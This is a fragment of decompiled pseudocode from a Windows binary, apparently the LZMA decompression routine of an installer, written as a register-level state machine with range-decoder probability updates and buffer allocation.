                            						 *(_t613 - 0x54) = _t606;
                            						L133:
                            						_t532 =  *_t606;
                            						_t589 = _t532 & 0x0000ffff;
                            						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                            						if( *(_t613 - 0xc) >= _t565) {
                            							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                            							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                            							 *(_t613 - 0x40) = 1;
                            							_t533 = _t532 - (_t532 >> 5);
                            							 *_t606 = _t533;
                            						} else {
                            							 *(_t613 - 0x10) = _t565;
                            							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                            							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                            						}
                            						if( *(_t613 - 0x10) >= 0x1000000) {
                            							L139:
                            							_t534 =  *(_t613 - 0x84);
                            							L140:
                            							 *(_t613 - 0x88) = _t534;
                            							goto L1;
                            						} else {
                            							L137:
                            							if( *(_t613 - 0x6c) == 0) {
                            								 *(_t613 - 0x88) = 5;
                            								goto L170;
                            							}
                            							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                            							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                            							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                            							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                            							goto L139;
                            						}
                            					} else {
                            						if( *(__ebp - 0x60) == 0) {
                            							L171:
                            							_t536 = _t535 | 0xffffffff;
                            							L172:
                            							return _t536;
                            						}
                            						__eax = 0;
                            						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                            						0 | _t258 = _t258 + _t258 + 9;
                            						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                            						L75:
                            						if( *(__ebp - 0x64) == 0) {
                            							 *(__ebp - 0x88) = 0x1b;
                            							L170:
                            							_t568 = 0x22;
                            							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                            							_t536 = 0;
                            							goto L172;
                            						}
                            						__eax =  *(__ebp - 0x14);
                            						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                            						if(__eax >=  *(__ebp - 0x74)) {
                            							__eax = __eax +  *(__ebp - 0x74);
                            						}
                            						__edx =  *(__ebp - 8);
                            						__cl =  *(__eax + __edx);
                            						__eax =  *(__ebp - 0x14);
                            						 *(__ebp - 0x5c) = __cl;
                            						 *(__eax + __edx) = __cl;
                            						__eax = __eax + 1;
                            						__edx = 0;
                            						_t274 = __eax %  *(__ebp - 0x74);
                            						__eax = __eax /  *(__ebp - 0x74);
                            						__edx = _t274;
                            						__eax =  *(__ebp - 0x68);
                            						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                            						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                            						_t283 = __ebp - 0x64;
                            						 *_t283 =  *(__ebp - 0x64) - 1;
                            						 *( *(__ebp - 0x68)) = __cl;
                            						L79:
                            						 *(__ebp - 0x14) = __edx;
                            						L80:
                            						 *(__ebp - 0x88) = 2;
                            					}
                            					L1:
                            					_t535 =  *(_t613 - 0x88);
                            					if(_t535 > 0x1c) {
                            						goto L171;
                            					}
                            					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
                            						case 0:
                            							if( *(_t613 - 0x6c) == 0) {
                            								goto L170;
                            							}
                            							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                            							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                            							_t535 =  *( *(_t613 - 0x70));
                            							if(_t535 > 0xe1) {
                            								goto L171;
                            							}
                            							_t539 = _t535 & 0x000000ff;
                            							_push(0x2d);
                            							asm("cdq");
                            							_pop(_t570);
                            							_push(9);
                            							_pop(_t571);
                            							_t609 = _t539 / _t570;
                            							_t541 = _t539 % _t570 & 0x000000ff;
                            							asm("cdq");
                            							_t604 = _t541 % _t571 & 0x000000ff;
                            							 *(_t613 - 0x3c) = _t604;
                            							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                            							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                            							_t612 = (0x300 << _t604 + _t609) + 0x736;
                            							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                            								L10:
                            								if(_t612 == 0) {
                            									L12:
                            									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                            									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                            									goto L15;
                            								} else {
                            									goto L11;
                            								}
                            								do {
                            									L11:
                            									_t612 = _t612 - 1;
                            									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                            								} while (_t612 != 0);
                            								goto L12;
                            							}
                            							if( *(_t613 - 4) != 0) {
                            								GlobalFree( *(_t613 - 4));
                            							}
                            							_t535 = GlobalAlloc(0x40, 0x600); // executed
                            							 *(_t613 - 4) = _t535;
                            							if(_t535 == 0) {
                            								goto L171;
                            							} else {
                            								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                            								goto L10;
                            							}
                            						case 1:
                            							L13:
                            							__eflags =  *(_t613 - 0x6c);
                            							if( *(_t613 - 0x6c) == 0) {
                            								 *(_t613 - 0x88) = 1;
                            								goto L170;
                            							}
                            							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                            							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                            							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                            							_t45 = _t613 - 0x48;
                            							 *_t45 =  *(_t613 - 0x48) + 1;
                            							__eflags =  *_t45;
                            							L15:
                            							if( *(_t613 - 0x48) < 4) {
                            								goto L13;
                            							}
                            							_t547 =  *(_t613 - 0x40);
                            							if(_t547 ==  *(_t613 - 0x74)) {
                            								L20:
                            								 *(_t613 - 0x48) = 5;
                            								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                            								goto L23;
                            							}
                            							 *(_t613 - 0x74) = _t547;
                            							if( *(_t613 - 8) != 0) {
                            								GlobalFree( *(_t613 - 8));
                            							}
                            							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                            							 *(_t613 - 8) = _t535;
                            							if(_t535 == 0) {
                            								goto L171;
                            							} else {
                            								goto L20;
                            							}
                            						case 2:
                            							L24:
                            							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                            							 *(_t613 - 0x84) = 6;
                            							 *(_t613 - 0x4c) = _t554;
                            							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                            							goto L132;
                            						case 3:
                            							L21:
                            							__eflags =  *(_t613 - 0x6c);
                            							if( *(_t613 - 0x6c) == 0) {
                            								 *(_t613 - 0x88) = 3;
                            								goto L170;
                            							}
                            							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                            							_t67 = _t613 - 0x70;
                            							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                            							__eflags =  *_t67;
                            							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                            							L23:
                            							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                            							if( *(_t613 - 0x48) != 0) {
                            								goto L21;
                            							}
                            							goto L24;
                            						case 4:
                            							goto L133;
                            						case 5:
                            							goto L137;
                            						case 6:
                            							__edx = 0;
                            							__eflags =  *(__ebp - 0x40);
                            							if( *(__ebp - 0x40) != 0) {
                            								__eax =  *(__ebp - 4);
                            								__ecx =  *(__ebp - 0x38);
                            								 *(__ebp - 0x34) = 1;
                            								 *(__ebp - 0x84) = 7;
                            								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                            								goto L132;
                            							}
                            							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                            							__esi =  *(__ebp - 0x60);
                            							__cl = 8;
                            							__cl = 8 -  *(__ebp - 0x3c);
                            							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                            							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                            							__ecx =  *(__ebp - 0x3c);
                            							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                            							__ecx =  *(__ebp - 4);
                            							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                            							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                            							__eflags =  *(__ebp - 0x38) - 4;
                            							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                            							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                            							if( *(__ebp - 0x38) >= 4) {
                            								__eflags =  *(__ebp - 0x38) - 0xa;
                            								if( *(__ebp - 0x38) >= 0xa) {
                            									_t98 = __ebp - 0x38;
                            									 *_t98 =  *(__ebp - 0x38) - 6;
                            									__eflags =  *_t98;
                            								} else {
                            									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                            								}
                            							} else {
                            								 *(__ebp - 0x38) = 0;
                            							}
                            							__eflags =  *(__ebp - 0x34) - __edx;
                            							if( *(__ebp - 0x34) == __edx) {
                            								__ebx = 0;
                            								__ebx = 1;
                            								goto L61;
                            							} else {
                            								__eax =  *(__ebp - 0x14);
                            								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                            								__eflags = __eax -  *(__ebp - 0x74);
                            								if(__eax >=  *(__ebp - 0x74)) {
                            									__eax = __eax +  *(__ebp - 0x74);
                            									__eflags = __eax;
                            								}
                            								__ecx =  *(__ebp - 8);
                            								__ebx = 0;
                            								__ebx = 1;
                            								__al =  *((intOrPtr*)(__eax + __ecx));
                            								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                            								goto L41;
                            							}
                            						case 7:
                            							__eflags =  *(__ebp - 0x40) - 1;
                            							if( *(__ebp - 0x40) != 1) {
                            								__eax =  *(__ebp - 0x24);
                            								 *(__ebp - 0x80) = 0x16;
                            								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                            								__eax =  *(__ebp - 0x28);
                            								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                            								__eax =  *(__ebp - 0x2c);
                            								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                            								__eax = 0;
                            								__eflags =  *(__ebp - 0x38) - 7;
                            								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                            								__al = __al & 0x000000fd;
                            								__eax = (__eflags >= 0) - 1 + 0xa;
                            								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                            								__eax =  *(__ebp - 4);
                            								__eax =  *(__ebp - 4) + 0x664;
                            								__eflags = __eax;
                            								 *(__ebp - 0x58) = __eax;
                            								goto L69;
                            							}
                            							__eax =  *(__ebp - 4);
                            							__ecx =  *(__ebp - 0x38);
                            							 *(__ebp - 0x84) = 8;
                            							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                            							goto L132;
                            						case 8:
                            							__eflags =  *(__ebp - 0x40);
                            							if( *(__ebp - 0x40) != 0) {
                            								__eax =  *(__ebp - 4);
                            								__ecx =  *(__ebp - 0x38);
                            								 *(__ebp - 0x84) = 0xa;
                            								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                            							} else {
                            								__eax =  *(__ebp - 0x38);
                            								__ecx =  *(__ebp - 4);
                            								__eax =  *(__ebp - 0x38) + 0xf;
                            								 *(__ebp - 0x84) = 9;
                            								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                            								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                            							}
                            							goto L132;
                            						case 9:
                            							goto L0;
                            						case 0xa:
                            							__eflags =  *(__ebp - 0x40);
                            							if( *(__ebp - 0x40) != 0) {
                            								__eax =  *(__ebp - 4);
                            								__ecx =  *(__ebp - 0x38);
                            								 *(__ebp - 0x84) = 0xb;
                            								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                            								goto L132;
                            							}
                            							__eax =  *(__ebp - 0x28);
                            							goto L88;
                            						case 0xb:
                            							__eflags =  *(__ebp - 0x40);
                            							if( *(__ebp - 0x40) != 0) {
                            								__ecx =  *(__ebp - 0x24);
                            								__eax =  *(__ebp - 0x20);
                            								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                            							} else {
                            								__eax =  *(__ebp - 0x24);
                            							}
                            							__ecx =  *(__ebp - 0x28);
                            							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                            							L88:
                            							__ecx =  *(__ebp - 0x2c);
                            							 *(__ebp - 0x2c) = __eax;
                            							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                            							goto L89;
                            						case 0xc:
                            							L99:
                            							__eflags =  *(__ebp - 0x6c);
                            							if( *(__ebp - 0x6c) == 0) {
                            								 *(__ebp - 0x88) = 0xc;
                            								goto L170;
                            							}
                            							__ecx =  *(__ebp - 0x70);
                            							__eax =  *(__ebp - 0xc);
                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            							_t334 = __ebp - 0x70;
                            							 *_t334 =  *(__ebp - 0x70) + 1;
                            							__eflags =  *_t334;
                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            							__eax =  *(__ebp - 0x2c);
                            							goto L101;
                            						case 0xd:
                            							L37:
                            							__eflags =  *(__ebp - 0x6c);
                            							if( *(__ebp - 0x6c) == 0) {
                            								 *(__ebp - 0x88) = 0xd;
                            								goto L170;
                            							}
                            							__ecx =  *(__ebp - 0x70);
                            							__eax =  *(__ebp - 0xc);
                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            							_t122 = __ebp - 0x70;
                            							 *_t122 =  *(__ebp - 0x70) + 1;
                            							__eflags =  *_t122;
                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            							L39:
                            							__eax =  *(__ebp - 0x40);
                            							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                            							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                            								goto L48;
                            							}
                            							__eflags = __ebx - 0x100;
                            							if(__ebx >= 0x100) {
                            								goto L54;
                            							}
                            							L41:
                            							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                            							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                            							__ecx =  *(__ebp - 0x58);
                            							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                            							 *(__ebp - 0x48) = __eax;
                            							__eax = __eax + 1;
                            							__eax = __eax << 8;
                            							__eax = __eax + __ebx;
                            							__esi =  *(__ebp - 0x58) + __eax * 2;
                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                            							__ax =  *__esi;
                            							 *(__ebp - 0x54) = __esi;
                            							__edx = __ax & 0x0000ffff;
                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                            							__eflags =  *(__ebp - 0xc) - __ecx;
                            							if( *(__ebp - 0xc) >= __ecx) {
                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                            								__cx = __ax;
                            								 *(__ebp - 0x40) = 1;
                            								__cx = __ax >> 5;
                            								__eflags = __eax;
                            								__ebx = __ebx + __ebx + 1;
                            								 *__esi = __ax;
                            							} else {
                            								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                            								 *(__ebp - 0x10) = __ecx;
                            								0x800 = 0x800 - __edx;
                            								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                            								__ebx = __ebx + __ebx;
                            								 *__esi = __cx;
                            							}
                            							__eflags =  *(__ebp - 0x10) - 0x1000000;
                            							 *(__ebp - 0x44) = __ebx;
                            							if( *(__ebp - 0x10) >= 0x1000000) {
                            								goto L39;
                            							} else {
                            								goto L37;
                            							}
                            						case 0xe:
                            							L46:
                            							__eflags =  *(__ebp - 0x6c);
                            							if( *(__ebp - 0x6c) == 0) {
                            								 *(__ebp - 0x88) = 0xe;
                            								goto L170;
                            							}
                            							__ecx =  *(__ebp - 0x70);
                            							__eax =  *(__ebp - 0xc);
                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            							_t156 = __ebp - 0x70;
                            							 *_t156 =  *(__ebp - 0x70) + 1;
                            							__eflags =  *_t156;
                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            							while(1) {
                            								L48:
                            								__eflags = __ebx - 0x100;
                            								if(__ebx >= 0x100) {
                            									break;
                            								}
                            								__eax =  *(__ebp - 0x58);
                            								__edx = __ebx + __ebx;
                            								__ecx =  *(__ebp - 0x10);
                            								__esi = __edx + __eax;
                            								__ecx =  *(__ebp - 0x10) >> 0xb;
                            								__ax =  *__esi;
                            								 *(__ebp - 0x54) = __esi;
                            								__edi = __ax & 0x0000ffff;
                            								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                            								__eflags =  *(__ebp - 0xc) - __ecx;
                            								if( *(__ebp - 0xc) >= __ecx) {
                            									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                            									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                            									__cx = __ax;
                            									_t170 = __edx + 1; // 0x1
                            									__ebx = _t170;
                            									__cx = __ax >> 5;
                            									__eflags = __eax;
                            									 *__esi = __ax;
                            								} else {
                            									 *(__ebp - 0x10) = __ecx;
                            									0x800 = 0x800 - __edi;
                            									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                            									__ebx = __ebx + __ebx;
                            									 *__esi = __cx;
                            								}
                            								__eflags =  *(__ebp - 0x10) - 0x1000000;
                            								 *(__ebp - 0x44) = __ebx;
                            								if( *(__ebp - 0x10) >= 0x1000000) {
                            									continue;
                            								} else {
                            									goto L46;
                            								}
                            							}
                            							L54:
                            							_t173 = __ebp - 0x34;
                            							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                            							__eflags =  *_t173;
                            							goto L55;
                            						case 0xf:
                            							L58:
                            							__eflags =  *(__ebp - 0x6c);
                            							if( *(__ebp - 0x6c) == 0) {
                            								 *(__ebp - 0x88) = 0xf;
                            								goto L170;
                            							}
                            							__ecx =  *(__ebp - 0x70);
                            							__eax =  *(__ebp - 0xc);
                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            							_t203 = __ebp - 0x70;
                            							 *_t203 =  *(__ebp - 0x70) + 1;
                            							__eflags =  *_t203;
                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            							L60:
                            							__eflags = __ebx - 0x100;
                            							if(__ebx >= 0x100) {
                            								L55:
                            								__al =  *(__ebp - 0x44);
                            								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                            								goto L56;
                            							}
                            							L61:
                            							__eax =  *(__ebp - 0x58);
                            							__edx = __ebx + __ebx;
                            							__ecx =  *(__ebp - 0x10);
                            							__esi = __edx + __eax;
                            							__ecx =  *(__ebp - 0x10) >> 0xb;
                            							__ax =  *__esi;
                            							 *(__ebp - 0x54) = __esi;
                            							__edi = __ax & 0x0000ffff;
                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                            							__eflags =  *(__ebp - 0xc) - __ecx;
                            							if( *(__ebp - 0xc) >= __ecx) {
                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                            								__cx = __ax;
                            								_t217 = __edx + 1; // 0x1
                            								__ebx = _t217;
                            								__cx = __ax >> 5;
                            								__eflags = __eax;
                            								 *__esi = __ax;
                            							} else {
                            								 *(__ebp - 0x10) = __ecx;
                            								0x800 = 0x800 - __edi;
                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                            								__ebx = __ebx + __ebx;
                            								 *__esi = __cx;
                            							}
                            							__eflags =  *(__ebp - 0x10) - 0x1000000;
                            							 *(__ebp - 0x44) = __ebx;
                            							if( *(__ebp - 0x10) >= 0x1000000) {
                            								goto L60;
                            							} else {
                            								goto L58;
                            							}
                            						case 0x10:
                            							L109:
                            							__eflags =  *(__ebp - 0x6c);
                            							if( *(__ebp - 0x6c) == 0) {
                            								 *(__ebp - 0x88) = 0x10;
                            								goto L170;
                            							}
                            							__ecx =  *(__ebp - 0x70);
                            							__eax =  *(__ebp - 0xc);
                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            							_t365 = __ebp - 0x70;
                            							 *_t365 =  *(__ebp - 0x70) + 1;
                            							__eflags =  *_t365;
                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            							goto L111;
                            						case 0x11:
                            							goto L69;
                            						case 0x12:
                            							__eflags =  *(__ebp - 0x40);
                            							if( *(__ebp - 0x40) != 0) {
                            								__eax =  *(__ebp - 0x58);
                            								 *(__ebp - 0x84) = 0x13;
                            								__esi =  *(__ebp - 0x58) + 2;
                            								goto L132;
                            							}
                            							__eax =  *(__ebp - 0x4c);
                            							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                            							__ecx =  *(__ebp - 0x58);
                            							__eax =  *(__ebp - 0x4c) << 4;
                            							__eflags = __eax;
                            							__eax =  *(__ebp - 0x58) + __eax + 4;
                            							goto L130;
                            						case 0x13:
                            							__eflags =  *(__ebp - 0x40);
                            							if( *(__ebp - 0x40) != 0) {
                            								_t469 = __ebp - 0x58;
                            								 *_t469 =  *(__ebp - 0x58) + 0x204;
                            								__eflags =  *_t469;
                            								 *(__ebp - 0x30) = 0x10;
                            								 *(__ebp - 0x40) = 8;
                            								L144:
                            								 *(__ebp - 0x7c) = 0x14;
                            								goto L145;
                            							}
                            							__eax =  *(__ebp - 0x4c);
                            							__ecx =  *(__ebp - 0x58);
                            							__eax =  *(__ebp - 0x4c) << 4;
                            							 *(__ebp - 0x30) = 8;
                            							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                            							L130:
                            							 *(__ebp - 0x58) = __eax;
                            							 *(__ebp - 0x40) = 3;
                            							goto L144;
                            						case 0x14:
                            							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                            							__eax =  *(__ebp - 0x80);
                            							goto L140;
                            						case 0x15:
                            							__eax = 0;
                            							__eflags =  *(__ebp - 0x38) - 7;
                            							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                            							__al = __al & 0x000000fd;
                            							__eax = (__eflags >= 0) - 1 + 0xb;
                            							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                            							goto L120;
                            						case 0x16:
                            							__eax =  *(__ebp - 0x30);
                            							__eflags = __eax - 4;
                            							if(__eax >= 4) {
                            								_push(3);
                            								_pop(__eax);
                            							}
                            							__ecx =  *(__ebp - 4);
                            							 *(__ebp - 0x40) = 6;
                            							__eax = __eax << 7;
                            							 *(__ebp - 0x7c) = 0x19;
                            							 *(__ebp - 0x58) = __eax;
                            							goto L145;
                            						case 0x17:
                            							L145:
                            							__eax =  *(__ebp - 0x40);
                            							 *(__ebp - 0x50) = 1;
                            							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                            							goto L149;
                            						case 0x18:
                            							L146:
                            							__eflags =  *(__ebp - 0x6c);
                            							if( *(__ebp - 0x6c) == 0) {
                            								 *(__ebp - 0x88) = 0x18;
                            								goto L170;
                            							}
                            							__ecx =  *(__ebp - 0x70);
                            							__eax =  *(__ebp - 0xc);
                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            							_t484 = __ebp - 0x70;
                            							 *_t484 =  *(__ebp - 0x70) + 1;
                            							__eflags =  *_t484;
                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            							L148:
                            							_t487 = __ebp - 0x48;
                            							 *_t487 =  *(__ebp - 0x48) - 1;
                            							__eflags =  *_t487;
                            							L149:
                            							__eflags =  *(__ebp - 0x48);
                            							if( *(__ebp - 0x48) <= 0) {
                            								__ecx =  *(__ebp - 0x40);
                            								__ebx =  *(__ebp - 0x50);
                            								0 = 1;
                            								__eax = 1 << __cl;
                            								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                            								__eax =  *(__ebp - 0x7c);
                            								 *(__ebp - 0x44) = __ebx;
                            								goto L140;
                            							}
                            							__eax =  *(__ebp - 0x50);
                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                            							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                            							__eax =  *(__ebp - 0x58);
                            							__esi = __edx + __eax;
                            							 *(__ebp - 0x54) = __esi;
                            							__ax =  *__esi;
                            							__edi = __ax & 0x0000ffff;
                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                            							__eflags =  *(__ebp - 0xc) - __ecx;
                            							if( *(__ebp - 0xc) >= __ecx) {
                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                            								__cx = __ax;
                            								__cx = __ax >> 5;
                            								__eax = __eax - __ecx;
                            								__edx = __edx + 1;
                            								__eflags = __edx;
                            								 *__esi = __ax;
                            								 *(__ebp - 0x50) = __edx;
                            							} else {
                            								 *(__ebp - 0x10) = __ecx;
                            								0x800 = 0x800 - __edi;
                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                            								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                            								 *__esi = __cx;
                            							}
                            							__eflags =  *(__ebp - 0x10) - 0x1000000;
                            							if( *(__ebp - 0x10) >= 0x1000000) {
                            								goto L148;
                            							} else {
                            								goto L146;
                            							}
                            						case 0x19:
                            							__eflags = __ebx - 4;
                            							if(__ebx < 4) {
                            								 *(__ebp - 0x2c) = __ebx;
                            								L119:
                            								_t393 = __ebp - 0x2c;
                            								 *_t393 =  *(__ebp - 0x2c) + 1;
                            								__eflags =  *_t393;
                            								L120:
                            								__eax =  *(__ebp - 0x2c);
                            								__eflags = __eax;
                            								if(__eax == 0) {
                            									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                            									goto L170;
                            								}
                            								__eflags = __eax -  *(__ebp - 0x60);
                            								if(__eax >  *(__ebp - 0x60)) {
                            									goto L171;
                            								}
